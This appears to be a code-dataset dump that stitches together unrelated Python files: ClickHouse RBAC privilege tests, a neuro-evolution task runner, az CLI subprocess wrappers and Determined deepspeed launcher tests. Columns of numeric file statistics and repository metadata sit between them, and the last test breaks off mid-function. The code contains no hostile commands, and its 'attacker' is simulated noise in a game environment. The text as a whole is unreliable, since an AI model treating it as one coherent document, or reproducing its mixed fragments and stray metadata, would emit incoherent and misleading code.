    ("d,a,b", "d,a,b", "x", "d,b", '\'2020-01-01\',9'),
    ("d,a,b", "b", "y", "d,a,b", '\'2020-01-01\',\'woo\',9')
])
def role_column_privileges(self, grant_columns, select_columns_pass, data_pass, table_type, revoke_columns=None, select_columns_fail=None, node=None):
    """Check that user is able to select from granted columns and unable
    to select from not granted or revoked columns.

    Role-based variant of `user_column_privileges`: the column grants go to
    role0 and the role is then granted to user0.

    :param grant_columns: columns to grant SELECT on (to the role)
    :param select_columns_pass: columns the insert/select steps use
    :param data_pass: literal VALUES payload matching select_columns_pass
    :param revoke_columns: columns to revoke afterwards (skipped when None)
    :param select_columns_fail: not-granted column expected to fail (skipped when None)
    :param node: cluster node to run on; defaults to the feature's node
    """
    if node is None:
        node = self.context.node
    with table(node, "merge_tree", table_type):
        with Given("The table has some data on some columns"):
            node.query(f"INSERT INTO merge_tree ({select_columns_pass}) VALUES ({data_pass})")
        with user(node, "user0"), role(node, "role0"):
            with When("I grant select privilege"):
                node.query(f"GRANT SELECT({grant_columns}) ON merge_tree TO role0")
            with And("I grant the role to a user"):
                node.query("GRANT role0 TO user0")
            if select_columns_fail is not None:
                with And("I select from not granted column"):
                    exitcode, message = errors.not_enough_privileges(name="user0")
                    node.query(f"SELECT ({select_columns_fail}) FROM merge_tree",
                        settings = [("user","user0")], exitcode=exitcode, message=message)
            with Then("I verify SELECT command"):
                user_select = node.query("SELECT d FROM merge_tree", settings = [("user","user0")])
                default = node.query("SELECT d FROM merge_tree")
                assert user_select.output == default.output, error()
            if revoke_columns is not None:
                with When("I revoke select privilege for columns from role"):
                    node.query(f"REVOKE SELECT({revoke_columns}) ON merge_tree FROM role0")
                with And("I select from revoked columns"):
                    exitcode, message = errors.not_enough_privileges(name="user0")
                    node.query(f"SELECT ({select_columns_pass}) FROM merge_tree",
                        settings = [("user","user0")], exitcode=exitcode, message=message)
@TestScenario
@Requirements(
    RQ_SRS_006_RBAC_Privileges_Select_GrantOption_Grant("1.0"),
)
def user_with_privilege_on_cluster(self, table_type, node=None):
    """Check that user is able to select from a table with
    privilege granted on a cluster.

    Uses explicit try/finally instead of the `user()` context manager
    because the user is created ON CLUSTER and must be dropped the same way.

    :param table_type: key into `table_types` selecting the engine DDL
    :param node: cluster node to run on; defaults to the feature's node
    """
    if node is None:
        node = self.context.node
    with table(node, "merge_tree", table_type):
        try:
            with Given("I have some data inserted into table"):
                node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')")
            with Given("I have a user on a cluster"):
                node.query("CREATE USER OR REPLACE user0 ON CLUSTER sharded_cluster")
            with When("I grant select privilege on a cluster"):
                node.query("GRANT ON CLUSTER sharded_cluster SELECT ON merge_tree TO user0")
            with Then("I verify SELECT command"):
                user_select = node.query("SELECT d FROM merge_tree", settings = [("user","user0")])
                default = node.query("SELECT d FROM merge_tree")
                assert user_select.output == default.output, error()
        finally:
            with Finally("I drop the user"):
                node.query("DROP USER user0 ON CLUSTER sharded_cluster")
@TestScenario
@Requirements(
    RQ_SRS_006_RBAC_Privileges_Select_GrantOption_Grant("1.0"),
)
def user_with_privilege_from_user_with_grant_option(self, table_type, node=None):
    """Check that user is able to select from a table when granted privilege
    from another user with grant option.

    :param table_type: key into `table_types` selecting the engine DDL
    :param node: cluster node to run on; defaults to the feature's node
    """
    if node is None:
        node = self.context.node
    with table(node, "merge_tree", table_type):
        with Given("I have some data inserted into table"):
            node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')")
        with user(node, "user0"), user(node, "user1"):
            with When("I grant privilege with grant option to user"):
                node.query("GRANT SELECT ON merge_tree TO user0 WITH GRANT OPTION")
            with And("I grant privilege to another user via grant option"):
                # user0 (not default) performs this grant, exercising the
                # grant-option path.
                node.query("GRANT SELECT ON merge_tree TO user1", settings = [("user","user0")])
            with Then("I verify SELECT command"):
                user_select = node.query("SELECT d FROM merge_tree", settings = [("user","user1")])
                default = node.query("SELECT d FROM merge_tree")
                assert user_select.output == default.output, error()
@TestScenario
@Requirements(
    RQ_SRS_006_RBAC_Privileges_Select_GrantOption_Grant("1.0"),
)
def role_with_privilege_from_user_with_grant_option(self, table_type, node=None):
    """Check that user is able to select from a table when granted a role with
    select privilege that was granted by another user with grant option.

    :param table_type: key into `table_types` selecting the engine DDL
    :param node: cluster node to run on; defaults to the feature's node
    """
    if node is None:
        node = self.context.node
    with table(node, "merge_tree", table_type):
        with Given("I have some data inserted into table"):
            node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')")
        with user(node, "user0"), user(node, "user1"), role(node, "role0"):
            with When("I grant privilege with grant option to user"):
                node.query("GRANT SELECT ON merge_tree TO user0 WITH GRANT OPTION")
            with And("I grant privilege to a role via grant option"):
                # user0 grants to the role, exercising user -> role delegation.
                node.query("GRANT SELECT ON merge_tree TO role0", settings = [("user","user0")])
            with And("I grant the role to another user"):
                node.query("GRANT role0 TO user1")
            with Then("I verify SELECT command"):
                user_select = node.query("SELECT d FROM merge_tree", settings = [("user","user1")])
                default = node.query("SELECT d FROM merge_tree")
                assert user_select.output == default.output, error()
@TestScenario
@Requirements(
    RQ_SRS_006_RBAC_Privileges_Select_GrantOption_Grant("1.0"),
)
def user_with_privilege_from_role_with_grant_option(self, table_type, node=None):
    """Check that user is able to select from a table when granted privilege from
    a role with grant option.

    :param table_type: key into `table_types` selecting the engine DDL
    :param node: cluster node to run on; defaults to the feature's node
    """
    if node is None:
        node = self.context.node
    with table(node, "merge_tree", table_type):
        with Given("I have some data inserted into table"):
            node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')")
        with user(node, "user0"), user(node, "user1"), role(node, "role0"):
            with When("I grant privilege with grant option to a role"):
                node.query("GRANT SELECT ON merge_tree TO role0 WITH GRANT OPTION")
            with When("I grant role to a user"):
                node.query("GRANT role0 TO user0")
            with And("I grant privilege to a user via grant option"):
                # user0 holds the grant option through role0.
                node.query("GRANT SELECT ON merge_tree TO user1", settings = [("user","user0")])
            with Then("I verify SELECT command"):
                user_select = node.query("SELECT d FROM merge_tree", settings = [("user","user1")])
                default = node.query("SELECT d FROM merge_tree")
                assert user_select.output == default.output, error()
@TestScenario
@Requirements(
    RQ_SRS_006_RBAC_Privileges_Select_GrantOption_Grant("1.0"),
)
def role_with_privilege_from_role_with_grant_option(self, table_type, node=None):
    """Check that a user is able to select from a table with a role that was
    granted privilege by another role with grant option.

    :param table_type: key into `table_types` selecting the engine DDL
    :param node: cluster node to run on; defaults to the feature's node
    """
    if node is None:
        node = self.context.node
    with table(node, "merge_tree", table_type):
        with Given("I have some data inserted into table"):
            node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')")
        with user(node, "user0"), user(node, "user1"), role(node, "role0"), role(node, "role1"):
            with When("I grant privilege with grant option to role"):
                node.query("GRANT SELECT ON merge_tree TO role0 WITH GRANT OPTION")
            with And("I grant the role to a user"):
                node.query("GRANT role0 TO user0")
            with And("I grant privilege to another role via grant option"):
                # user0 holds the grant option through role0 and passes the
                # privilege on to role1 (role -> role delegation).
                node.query("GRANT SELECT ON merge_tree TO role1", settings = [("user","user0")])
            with And("I grant the second role to another user"):
                node.query("GRANT role1 TO user1")
            with Then("I verify SELECT command"):
                user_select = node.query("SELECT d FROM merge_tree", settings = [("user","user1")])
                default = node.query("SELECT d FROM merge_tree")
                assert user_select.output == default.output, error()
@TestScenario
@Requirements(
    RQ_SRS_006_RBAC_Privileges_Select_GrantOption_Revoke("1.0"),
)
def revoke_privilege_from_user_via_user_with_grant_option(self, table_type, node=None):
    """Check that user is unable to revoke a column they don't have access to from a user.

    user0 holds grant option only on column `d`, so revoking column `b`
    from user1 must fail with a privilege error.

    :param table_type: key into `table_types` selecting the engine DDL
    :param node: cluster node to run on; defaults to the feature's node
    """
    if node is None:
        node = self.context.node
    with table(node, "merge_tree", table_type):
        with user(node, "user0"), user(node, "user1"):
            with When("I grant privilege with grant option to user"):
                node.query("GRANT SELECT(d) ON merge_tree TO user0 WITH GRANT OPTION")
            with Then("I revoke privilege on a column the user with grant option does not have access to"):
                exitcode, message = errors.not_enough_privileges(name="user0")
                node.query("REVOKE SELECT(b) ON merge_tree FROM user1", settings=[("user","user0")],
                    exitcode=exitcode, message=message)
@TestScenario
@Requirements(
    RQ_SRS_006_RBAC_Privileges_Select_GrantOption_Revoke("1.0"),
)
def revoke_privilege_from_role_via_user_with_grant_option(self, table_type, node=None):
    """Check that user is unable to revoke a column they don't have access to from a role.

    user0 holds grant option only on column `d`, so revoking column `b`
    from role0 must fail with a privilege error.

    :param table_type: key into `table_types` selecting the engine DDL
    :param node: cluster node to run on; defaults to the feature's node
    """
    if node is None:
        node = self.context.node
    with table(node, "merge_tree", table_type):
        with user(node, "user0"), role(node, "role0"):
            with When("I grant privilege with grant option to user"):
                node.query("GRANT SELECT(d) ON merge_tree TO user0 WITH GRANT OPTION")
            with Then("I revoke privilege on a column the user with grant option does not have access to"):
                exitcode, message = errors.not_enough_privileges(name="user0")
                node.query("REVOKE SELECT(b) ON merge_tree FROM role0", settings=[("user","user0")],
                    exitcode=exitcode, message=message)
@TestScenario
@Requirements(
    RQ_SRS_006_RBAC_Privileges_Select_GrantOption_Revoke("1.0"),
)
def revoke_privilege_from_user_via_role_with_grant_option(self, table_type, node=None):
    """Check that user with a role is unable to revoke a column they don't have access to from a user.

    role0 (held by user0) has grant option only on column `d`, so revoking
    column `b` from user1 must fail with a privilege error.

    :param table_type: key into `table_types` selecting the engine DDL
    :param node: cluster node to run on; defaults to the feature's node
    """
    if node is None:
        node = self.context.node
    with table(node, "merge_tree", table_type):
        with user(node, "user0"), user(node,"user1"), role(node, "role0"):
            with When("I grant privilege with grant option to a role"):
                node.query("GRANT SELECT(d) ON merge_tree TO role0 WITH GRANT OPTION")
            with And("I grant the role to a user"):
                node.query("GRANT role0 TO user0")
            with Then("I revoke privilege on a column the user with grant option does not have access to"):
                exitcode, message = errors.not_enough_privileges(name="user0")
                node.query("REVOKE SELECT(b) ON merge_tree FROM user1", settings=[("user","user0")],
                    exitcode=exitcode, message=message)
@TestScenario
@Requirements(
    RQ_SRS_006_RBAC_Privileges_Select_GrantOption_Revoke("1.0"),
)
def revoke_privilege_from_role_via_role_with_grant_option(self, table_type, node=None):
    """Check that user with a role is unable to revoke a column they don't have access to from a role.

    role0 (held by user0) has grant option only on column `d`, so revoking
    column `b` from role1 must fail with a privilege error.

    :param table_type: key into `table_types` selecting the engine DDL
    :param node: cluster node to run on; defaults to the feature's node
    """
    if node is None:
        node = self.context.node
    with table(node, "merge_tree", table_type):
        with user(node, "user0"), role(node, "role0"), role(node, "role1"):
            with When("I grant privilege with grant option to a role"):
                # Fixed: previously granted "TO user0", which contradicts the
                # step name and left role0 without any privilege — the
                # "via role" path this scenario exists to test was never
                # exercised. Grant to role0, as the sibling scenario
                # revoke_privilege_from_user_via_role_with_grant_option does.
                node.query("GRANT SELECT(d) ON merge_tree TO role0 WITH GRANT OPTION")
            with And("I grant the role to a user"):
                node.query("GRANT role0 TO user0")
            with Then("I revoke privilege on a column the user with grant option does not have access to"):
                exitcode, message = errors.not_enough_privileges(name="user0")
                node.query("REVOKE SELECT(b) ON merge_tree FROM role1", settings=[("user","user0")],
                    exitcode=exitcode, message=message)
@TestOutline(Feature)
@Requirements(
    RQ_SRS_006_RBAC_Privileges_Select("1.0"),
)
@Examples("table_type", [
    (table_type, Requirements(requirement)) for table_type, requirement in list(table_requirements.items())
])
@Name("select")
def feature(self, table_type, node="clickhouse1"):
    """Run every SELECT-privilege scenario against the given table engine."""
    self.context.node = self.context.cluster.node(node)
    # Scenarios run in this exact order; each is parameterized by the
    # engine selected via the @Examples table above.
    scenarios = (
        without_privilege,
        user_with_privilege,
        user_with_revoked_privilege,
        user_with_privilege_on_columns,
        role_with_privilege,
        role_with_revoked_privilege,
        user_with_revoked_role,
        role_with_privilege_on_columns,
        user_with_privilege_on_cluster,
        user_with_privilege_from_user_with_grant_option,
        role_with_privilege_from_user_with_grant_option,
        user_with_privilege_from_role_with_grant_option,
        role_with_privilege_from_role_with_grant_option,
        revoke_privilege_from_user_via_user_with_grant_option,
        revoke_privilege_from_role_via_user_with_grant_option,
        revoke_privilege_from_user_via_role_with_grant_option,
        revoke_privilege_from_role_via_role_with_grant_option,
    )
    for scenario in scenarios:
        Scenario(test=scenario)(table_type=table_type)
| 52.60757
| 311
| 0.653224
| 3,604
| 26,409
| 4.617925
| 0.048835
| 0.044343
| 0.036051
| 0.016584
| 0.879469
| 0.862765
| 0.840413
| 0.822868
| 0.80971
| 0.787418
| 0
| 0.020871
| 0.236169
| 26,409
| 502
| 312
| 52.60757
| 0.804184
| 0.071112
| 0
| 0.657343
| 0
| 0.016317
| 0.323186
| 0.017747
| 0
| 0
| 0
| 0
| 0.02331
| 1
| 0.053613
| false
| 0.025641
| 0.013986
| 0
| 0.067599
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a2d9df25d6bf2f171f7fd2837fcce9cc2bb551e8
| 7,428
|
py
|
Python
|
tasks/task_handler.py
|
HaolingZHANG/ReverseEncodingTree
|
16558ae18d71e7b1f089bfc6f4d819ad017d0f25
|
[
"Apache-2.0"
] | 14
|
2020-02-11T11:45:07.000Z
|
2022-03-10T23:47:45.000Z
|
tasks/task_handler.py
|
HaolingZHANG/ReverseEncodingTree
|
16558ae18d71e7b1f089bfc6f4d819ad017d0f25
|
[
"Apache-2.0"
] | 2
|
2020-02-02T10:49:51.000Z
|
2020-07-19T10:37:32.000Z
|
tasks/task_handler.py
|
HaolingZHANG/ReverseEncodingTree
|
16558ae18d71e7b1f089bfc6f4d819ad017d0f25
|
[
"Apache-2.0"
] | null | null | null |
from ReverseEncodingTree.evolution.bean.attacker import *
from ReverseEncodingTree.tasks.task_inform import *
def run_imply():
    """Run the IMPLY logic task once per evolution strategy (N, FS, BI, GS)
    and save each run's generation-count distribution under ../output/."""
    for strategy in (MethodType.N, MethodType.FS, MethodType.BI, MethodType.GS):
        task = Logic(method_type=strategy, logic_type=LogicType.IMPLY, max_generation=500, display_results=False)
        generations, counts = task.run(1000)
        save_distribution(counts, "../output/", "IMPLY", strategy)
def run_nand():
    """Run the NAND logic task once per evolution strategy (N, FS, BI, GS)
    and save each run's generation-count distribution under ../output/."""
    for strategy in (MethodType.N, MethodType.FS, MethodType.BI, MethodType.GS):
        task = Logic(method_type=strategy, logic_type=LogicType.NAND, max_generation=500, display_results=False)
        generations, counts = task.run(1000)
        save_distribution(counts, "../output/", "NAND", strategy)
def run_nor():
    """Run the NOR logic task once per evolution strategy (N, FS, BI, GS)
    and save each run's generation-count distribution under ../output/."""
    for strategy in (MethodType.N, MethodType.FS, MethodType.BI, MethodType.GS):
        task = Logic(method_type=strategy, logic_type=LogicType.NOR, max_generation=500, display_results=False)
        generations, counts = task.run(1000)
        save_distribution(counts, "../output/", "NOR", strategy)
def run_xor():
    """Run the XOR logic task once per evolution strategy (N, FS, BI, GS)
    and save each run's generation-count distribution under ../output/."""
    for strategy in (MethodType.N, MethodType.FS, MethodType.BI, MethodType.GS):
        task = Logic(method_type=strategy, logic_type=LogicType.XOR, max_generation=500, display_results=False)
        generations, counts = task.run(1000)
        save_distribution(counts, "../output/", "XOR", strategy)
def run_cart_pole_v0():
    """Run the CartPole-v0 game task once per evolution strategy
    (N, FS, BI, GS) and save each run's generation-count distribution
    under ../output/."""
    for strategy in (MethodType.N, MethodType.FS, MethodType.BI, MethodType.GS):
        task = Game(method_type=strategy, game_type=GameType.CartPole_v0, episode_steps=300, episode_generation=10,
                    max_generation=500, display_results=False)
        generations, counts = task.run(1000)
        save_distribution(counts, "../output/", "CartPole_v0", strategy)
def run_cart_pole_v0_with_attack():
    """Run the CartPole-v0 game task under a Gaussian-noise attacker for the
    FS, BI and GS strategies and save each run's distribution under ../output/.

    NOTE(review): the FS run uses episode_steps=500 / episode_generation=20
    while BI and GS use 300 / 10 — presumably intentional, but confirm.
    """
    attacker = CartPole_v0_Attacker(attack_type=AttackType.Gaussian, gaussian_peak=1000)
    noise_level = 1
    task = Game(method_type=MethodType.FS, game_type=GameType.CartPole_v0, episode_steps=500, episode_generation=20,
                attacker=attacker, noise_level=noise_level, max_generation=500, display_results=False)
    generations, counts = task.run(1000)
    save_distribution(counts, "../output/", "CartPole_v0", MethodType.FS)
    task = Game(method_type=MethodType.BI, game_type=GameType.CartPole_v0, episode_steps=300, episode_generation=10,
                attacker=attacker, noise_level=noise_level, max_generation=500, display_results=False)
    generations, counts = task.run(1000)
    save_distribution(counts, "../output/", "CartPole_v0", MethodType.BI)
    task = Game(method_type=MethodType.GS, game_type=GameType.CartPole_v0, episode_steps=300, episode_generation=10,
                attacker=attacker, noise_level=noise_level, max_generation=500, display_results=False)
    generations, counts = task.run(1000)
    # Fixed: was MethodType.GSS — a member name used nowhere else in this
    # module; every other run labels the GS strategy with MethodType.GS.
    save_distribution(counts, "../output/", "CartPole_v0", MethodType.GS)
def run_lunar_lander_v0():
    """Run the LunarLander task once per evolution strategy (N, FS, BI, GS)
    and save each run's generation-count distribution under ../output/.

    NOTE: the function name says v0 but the game played is
    GameType.LunarLander_v2; the name is kept for caller compatibility.
    """
    for strategy in (MethodType.N, MethodType.FS, MethodType.BI, MethodType.GS):
        task = Game(method_type=strategy, game_type=GameType.LunarLander_v2, episode_steps=100, episode_generation=2,
                    max_generation=500, display_results=False)
        generations, counts = task.run(1000)
        save_distribution(counts, "../output/", "LunarLander_v2", strategy)
| 53.438849
| 119
| 0.72469
| 917
| 7,428
| 5.645583
| 0.067612
| 0.052154
| 0.104308
| 0.119954
| 0.947074
| 0.947074
| 0.947074
| 0.940506
| 0.940506
| 0.917327
| 0
| 0.042934
| 0.150242
| 7,428
| 138
| 120
| 53.826087
| 0.77725
| 0
| 0
| 0.446602
| 0
| 0
| 0.063512
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067961
| false
| 0
| 0.019417
| 0
| 0.087379
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a2e4a9132af3a8097c0204f77859b0f5de9f38b2
| 1,803
|
py
|
Python
|
test/pyaz/network/application_gateway/waf_config/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
test/pyaz/network/application_gateway/waf_config/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | 9
|
2021-09-24T16:37:24.000Z
|
2021-12-24T00:39:19.000Z
|
test/pyaz/network/application_gateway/waf_config/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
import json, subprocess
from .... pyaz_utils import get_cli_name, get_params
def set(resource_group, gateway_name, enabled, firewall_mode=None, rule_set_type=None, rule_set_version=None, disabled_rule_groups=None, disabled_rules=None, request_body_check=None, max_request_body_size=None, file_upload_limit=None, exclusion=None, no_wait=None):
    """Run `az network application-gateway waf-config set` with the given arguments.

    All parameters are forwarded to the CLI via get_params(locals()).
    Returns the parsed JSON the CLI printed on stdout.
    Raises Exception carrying the CLI's stderr text when stdout is empty.

    NOTE(review): shell=True with string-interpolated parameters is
    injection-prone if any argument is attacker-controlled; a list argv with
    shell=False would be safer, but is left as-is to match this module's
    generated-wrapper convention.  (Name `set` shadows the builtin but is
    the module's public interface, so it is kept.)
    """
    params = get_params(locals())
    command = "az network application-gateway waf-config set " + params
    print(command)
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    # BUG FIX: the original had unreachable `print` statements after both the
    # `return` and the `raise`; that dead code is removed.
    raise Exception(stderr)
def show(resource_group, gateway_name):
    """Run `az network application-gateway waf-config show` for the gateway.

    Returns the parsed JSON the CLI printed on stdout.
    Raises Exception carrying the CLI's stderr text when stdout is empty.

    NOTE(review): shell=True with an interpolated command string is
    injection-prone; kept to match this module's generated-wrapper style.
    """
    params = get_params(locals())
    command = "az network application-gateway waf-config show " + params
    print(command)
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    # BUG FIX: removed unreachable `print` statements that followed the
    # `return` and `raise` in the original.
    raise Exception(stderr)
def list_rule_sets(type=None, version=None, group=None):
    """Run `az network application-gateway waf-config list-rule-sets`.

    Returns the parsed JSON the CLI printed on stdout.
    Raises Exception carrying the CLI's stderr text when stdout is empty.

    NOTE(review): parameter name `type` shadows the builtin but mirrors the
    CLI flag and is part of the public interface, so it is kept.
    """
    params = get_params(locals())
    command = "az network application-gateway waf-config list-rule-sets " + params
    print(command)
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    # BUG FIX: removed unreachable `print` statements that followed the
    # `return` and `raise` in the original.
    raise Exception(stderr)
| 39.195652
| 265
| 0.694953
| 232
| 1,803
| 5.275862
| 0.271552
| 0.068627
| 0.04902
| 0.051471
| 0.71732
| 0.71732
| 0.71732
| 0.71732
| 0.71732
| 0.71732
| 0
| 0.004127
| 0.193566
| 1,803
| 45
| 266
| 40.066667
| 0.837689
| 0
| 0
| 0.804878
| 0
| 0
| 0.099834
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073171
| false
| 0
| 0.04878
| 0
| 0.195122
| 0.219512
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a7508d8d542ee7d8ebcacd1dd7261edfe36da576
| 9,803
|
py
|
Python
|
harness/tests/launch/test_autodeepspeed.py
|
prabhum456/determined
|
7e8017df0f62d80d21f5483578e2d5abd0e30935
|
[
"Apache-2.0"
] | null | null | null |
harness/tests/launch/test_autodeepspeed.py
|
prabhum456/determined
|
7e8017df0f62d80d21f5483578e2d5abd0e30935
|
[
"Apache-2.0"
] | null | null | null |
harness/tests/launch/test_autodeepspeed.py
|
prabhum456/determined
|
7e8017df0f62d80d21f5483578e2d5abd0e30935
|
[
"Apache-2.0"
] | null | null | null |
import contextlib
import os
import time
import unittest.mock as mock
from typing import Any, Iterator, List
import pytest
from deepspeed.launcher.runner import DEEPSPEED_ENVIRONMENT_NAME
import determined as det
from determined import constants
from determined.launch import autodeepspeed
@mock.patch("subprocess.Popen")
@mock.patch("determined.get_cluster_info")
@mock.patch("determined.util.check_sshd")
@mock.patch("time.time")
def test_launch_multi_slot_chief(
    mock_time: mock.MagicMock,
    mock_check_sshd: mock.MagicMock,
    mock_cluster_info: mock.MagicMock,
    mock_subprocess: mock.MagicMock,
) -> None:
    """Chief container (rank 0) of a two-container allocation: main() must
    start sshd, probe sshd on every peer, run the deepspeed launch chain,
    export the expected environment variables, and tear sshd down."""
    cluster_info = make_mock_cluster_info(["0.0.0.0", "0.0.0.1"], 0)
    mock_cluster_info.return_value = cluster_info
    # Freeze time so the sshd-probe deadline (start + 20) is predictable.
    mock_start_time = time.time()
    mock_time.return_value = mock_start_time
    train_entrypoint = "model_def:TrialClass"
    # Rebuild the command lists the same way main() is expected to.
    sshd_cmd = autodeepspeed.create_sshd_cmd()
    pid_server_cmd = autodeepspeed.create_pid_server_cmd(
        cluster_info.allocation_id, len(cluster_info.slot_ids)
    )
    deepspeed_cmd = autodeepspeed.create_run_command(
        cluster_info.container_addrs[0], autodeepspeed.hostfile_path
    )
    pid_client_cmd = autodeepspeed.create_pid_client_cmd(cluster_info.allocation_id)
    log_redirect_cmd = autodeepspeed.create_log_redirect_cmd()
    harness_cmd = autodeepspeed.create_harness_cmd(train_entrypoint)
    launch_cmd = pid_server_cmd + deepspeed_cmd + pid_client_cmd + log_redirect_cmd + harness_cmd
    sshd_proc_mock = mock.MagicMock()
    launch_proc_mock = mock.MagicMock()

    def mock_process(cmd: List[str], *args: Any, **kwargs: Any) -> Any:
        # Route each Popen call to the mock that matches its command list.
        if cmd == sshd_cmd:
            return sshd_proc_mock(*args, **kwargs)
        if cmd == launch_cmd:
            return launch_proc_mock(*args, **kwargs)
        return None

    mock_subprocess.side_effect = mock_process
    with set_container_id_env_var():
        autodeepspeed.main(train_entrypoint)
    mock_cluster_info.assert_called_once()
    assert os.environ["DET_CHIEF_IP"] == cluster_info.container_addrs[0]
    assert os.environ["USE_DEEPSPEED"] == "1"
    assert os.environ["PDSH_SSH_ARGS"] == (
        "-o PasswordAuthentication=no -o StrictHostKeyChecking=no "
        f"-p {constants.DTRAIN_SSH_PORT} -2 -a -x %h"
    )
    mock_subprocess.assert_has_calls([mock.call(sshd_cmd), mock.call(launch_cmd)])
    # Every container (chief included) must have been probed for sshd.
    assert mock_check_sshd.call_count == len(cluster_info.container_addrs)
    mock_check_sshd.assert_has_calls(
        [
            mock.call(addr, mock_start_time + 20, constants.DTRAIN_SSH_PORT)
            for addr in cluster_info.container_addrs
        ]
    )
    launch_proc_mock().wait.assert_called_once()
    sshd_proc_mock().kill.assert_called_once()
    sshd_proc_mock().wait.assert_called_once()
    # Cleanup deepspeed environment file created in autodeepspeed.main
    deepspeed_env_path = os.path.join(os.getcwd(), DEEPSPEED_ENVIRONMENT_NAME)
    if os.path.isfile(deepspeed_env_path):
        os.remove(deepspeed_env_path)
@mock.patch("subprocess.Popen")
@mock.patch("determined.get_cluster_info")
@mock.patch("determined.util.check_sshd")
@mock.patch("time.time")
def test_launch_multi_slot_fail(
    mock_time: mock.MagicMock,
    mock_check_sshd: mock.MagicMock,
    mock_cluster_info: mock.MagicMock,
    mock_subprocess: mock.MagicMock,
) -> None:
    """When the first sshd probe raises, main() must propagate the error,
    never run the deepspeed launch command, and still kill its own sshd."""
    cluster_info = make_mock_cluster_info(["0.0.0.0", "0.0.0.1"], 0)
    mock_cluster_info.return_value = cluster_info
    # Freeze time so the probe deadline (start + 20) is predictable.
    mock_start_time = time.time()
    mock_time.return_value = mock_start_time
    # Make the very first sshd check fail.
    mock_check_sshd.side_effect = ValueError("no sshd greeting")
    train_entrypoint = "model_def:TrialClass"
    # Rebuild the command lists the same way main() is expected to.
    sshd_cmd = autodeepspeed.create_sshd_cmd()
    pid_server_cmd = autodeepspeed.create_pid_server_cmd(
        cluster_info.allocation_id, len(cluster_info.slot_ids)
    )
    deepspeed_cmd = autodeepspeed.create_run_command(
        cluster_info.container_addrs[0], autodeepspeed.hostfile_path
    )
    pid_client_cmd = autodeepspeed.create_pid_client_cmd(cluster_info.allocation_id)
    log_redirect_cmd = autodeepspeed.create_log_redirect_cmd()
    harness_cmd = autodeepspeed.create_harness_cmd(train_entrypoint)
    launch_cmd = pid_server_cmd + deepspeed_cmd + pid_client_cmd + log_redirect_cmd + harness_cmd
    sshd_proc_mock = mock.MagicMock()
    launch_proc_mock = mock.MagicMock()

    def mock_process(cmd: List[str], *args: Any, **kwargs: Any) -> Any:
        # Route each Popen call to the mock that matches its command list.
        if cmd == sshd_cmd:
            return sshd_proc_mock(*args, **kwargs)
        if cmd == launch_cmd:
            return launch_proc_mock(*args, **kwargs)
        return None

    mock_subprocess.side_effect = mock_process
    with set_container_id_env_var():
        with pytest.raises(ValueError, match="no sshd greeting"):
            autodeepspeed.main(train_entrypoint)
    mock_cluster_info.assert_called_once()
    assert os.environ["DET_CHIEF_IP"] == cluster_info.container_addrs[0]
    assert os.environ["USE_DEEPSPEED"] == "1"
    assert os.environ["PDSH_SSH_ARGS"] == (
        "-o PasswordAuthentication=no -o StrictHostKeyChecking=no "
        f"-p {constants.DTRAIN_SSH_PORT} -2 -a -x %h"
    )
    # Only sshd was launched — the failing probe aborts before launch_cmd.
    mock_subprocess.assert_called_once_with(sshd_cmd)
    mock_check_sshd.assert_called_once_with(
        cluster_info.container_addrs[0], mock_start_time + 20, constants.DTRAIN_SSH_PORT
    )
    # sshd must still be torn down on the error path.
    sshd_proc_mock().kill.assert_called_once()
    sshd_proc_mock().wait.assert_called_once()
    # Cleanup deepspeed environment file created in autodeepspeed.main
    deepspeed_env_path = os.path.join(os.getcwd(), DEEPSPEED_ENVIRONMENT_NAME)
    if os.path.isfile(deepspeed_env_path):
        os.remove(deepspeed_env_path)
@mock.patch("subprocess.Popen")
@mock.patch("determined.get_cluster_info")
def test_launch_one_slot(
    mock_cluster_info: mock.MagicMock, mock_subprocess: mock.MagicMock
) -> None:
    """Single-container allocation: no sshd is needed and the deepspeed run
    command targets localhost; only the launch chain is executed."""
    cluster_info = make_mock_cluster_info(["0.0.0.0"], 0)
    mock_cluster_info.return_value = cluster_info
    train_entrypoint = "model_def:TrialClass"
    # Rebuild the expected launch chain (note "localhost", not a peer addr).
    pid_server_cmd = autodeepspeed.create_pid_server_cmd(
        cluster_info.allocation_id, len(cluster_info.slot_ids)
    )
